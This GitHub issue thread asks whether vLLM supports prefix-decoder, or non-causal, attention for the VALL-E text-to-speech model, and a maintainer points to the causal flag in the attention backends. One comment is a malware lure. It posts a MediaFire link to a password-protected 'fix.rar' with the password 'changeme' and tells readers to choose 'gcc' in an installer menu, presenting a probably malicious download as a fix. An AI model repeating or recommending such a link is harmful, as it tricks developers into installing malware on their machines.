### ISSUE TITLE
[Usage]: Does vLLM support prefix decoder / causal mask with prefix? 

### ISSUE THREAD

**Issue by rayhuang90** [vllm-project/vllm#7895]
### Your current environment

```text
vLLM Version: 0.5.4@4db5176d9758b720b05460c50ace3c01026eb158
```

### How would you like to use vllm

![image](https://github.com/user-attachments/assets/aa642e06-95f0-4360-8029-67c8aef9f182)

To my understanding, vLLM has supported "Causal Decoder" and "Encoder-Decoder". Does vLLM support prefix decoder? How can I add a prefix decoder model into vLLM?

I want to run inference of a Text-To-Speech LLM [VALL-E](https://arxiv.org/abs/2301.02111), which input is text and outputs audio in an auto-regressive manner. I don't know how to implement non-causal (bidirectional) self-attentsion in vLLM.  Any help is appreciated.

<img width="390" alt="prefix_attn" src="https://github.com/user-attachments/assets/06d74564-a935-4a5b-931f-8d358fb50cd6">

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by simon-mo** [comment]
I would recommend looking into how to supply causal=false into either xformers or flash attention in attn_backends
